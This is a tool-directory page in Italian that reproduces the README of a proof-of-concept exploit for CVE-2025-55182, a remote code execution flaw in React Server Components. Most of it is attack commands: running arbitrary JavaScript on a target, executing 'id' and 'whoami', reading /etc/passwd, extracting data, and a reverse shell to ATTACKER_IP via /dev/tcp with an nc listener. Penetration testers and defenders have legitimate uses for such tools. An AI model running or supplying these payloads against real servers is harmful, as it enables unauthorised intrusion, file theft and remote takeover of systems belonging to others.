Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
Strumenti/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

Vedi Repository
119 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

Scanner di Remote Code Execution per React Server Components (RSC)

CVE Python


Crediti

RuoloNomeLink
Ricerca originaleLachlan Davidsongithub.com/lachlan2k

Basato sul PoC originale: React2Shell-CVE-2025-55182-original-poc


Panoramica

React2Shell è uno scanner di sicurezza completo per CVE-2025-55182, una vulnerabilità critica di Remote Code Execution (RCE) che colpisce le implementazioni di React Server Components (RSC). Questa vulnerabilità consente ad attaccanti non autenticati di eseguire codice JavaScript arbitrario sul server tramite deserializzazione non sicura nel protocollo React Flight.

Caratteristiche principali

  • Test Multi-Variante: Testa 4 diverse strutture di payload provenienti dalla ricerca originale
  • Rilevamento Versioni: Identifica le versioni vulnerabili di React e dei framework
  • Verifica RCE: Conferma l'esecuzione di codice tramite variazione del digest, timing e callback OOB
  • Test OOB: Supporto per Burp Collaborator e Interactsh
  • Payload Personalizzati: Esegui JavaScript arbitrario su server vulnerabili
  • Estrazione Dati: Esfiltrazione di dati carattere per carattere
  • Output Professionale: Output del terminale pulito e colorato con raccolta di prove

Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Install dependencies
pip install requests

# Run the scanner
python3 exploit_cve_2025_55182_v2.py -h

Utilizzo

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]
ParametroDescrizione
-t, --targetURL di destinazione (es., https://example.com)
-f, --fileFile contenente un elenco di URL (uno per riga) per la scansione batch
-m, --modeModalità di scansione: version (predefinita), verify o custom
--jsCodice JavaScript per la modalità custom
--extractEstrai il risultato stringa carattere per carattere
--sleep SECONDSVerifica RCE basata sul tempo (modalità verify)
--callback URLURL di callback HTTP per test OOB (modalità verify)
--dns DOMAINDominio di callback DNS per test OOB (modalità verify)
-v, --verboseOutput verboso con i dettagli del payload
--no-colorDisabilita l'output colorato
--timeout SECONDSTimeout della richiesta HTTP (predefinito: 30)

Modalità di scansione

1. Modalità Version (predefinita)

Rileva passivamente le versioni vulnerabili di React e dei framework:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. Modalità Verify (-m verify)

Conferma attivamente la RCE utilizzando più tecniche e tutte e 4 le varianti di payload:

root@kitploit:~
# Basic verification (digest variation)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# With time-based verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# With OOB callback (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# Full verification with verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. Modalità Custom (-m custom)

Esegui payload JavaScript arbitrari:

root@kitploit:~
# Get Node.js version
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Execute system command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# Read file
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. Scansione Batch (-f)

Scansiona più URL da un file e mostra solo i target vulnerabili:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

Esempi

Scansioni di base

root@kitploit:~
# Version detection (default mode)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# RCE verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Batch scan multiple targets
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# Verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

Utilizzo avanzato

root@kitploit:~
# Time-based + OOB verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# Extract server info
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Execute command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

Reverse Shell

root@kitploit:~
# Start listener
nc -lvnp 443

# Execute reverse shell
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi.

  • Utilizzalo solo su sistemi di tua proprietà o per i quali disponi di esplicita autorizzazione al test
  • L'accesso non autorizzato ai sistemi informatici è illegale
  • Gli autori non sono responsabili dell'uso improprio di questo strumento
  • Segui sempre le pratiche di divulgazione responsabile

Riferimenti

  • CVE-2025-55182 - NVD
  • PoC originale di Lachlan Davidson
  • Avviso di sicurezza React
  • Avviso di sicurezza Next.js
  • Documentazione di React Server Components
Scarica lo strumento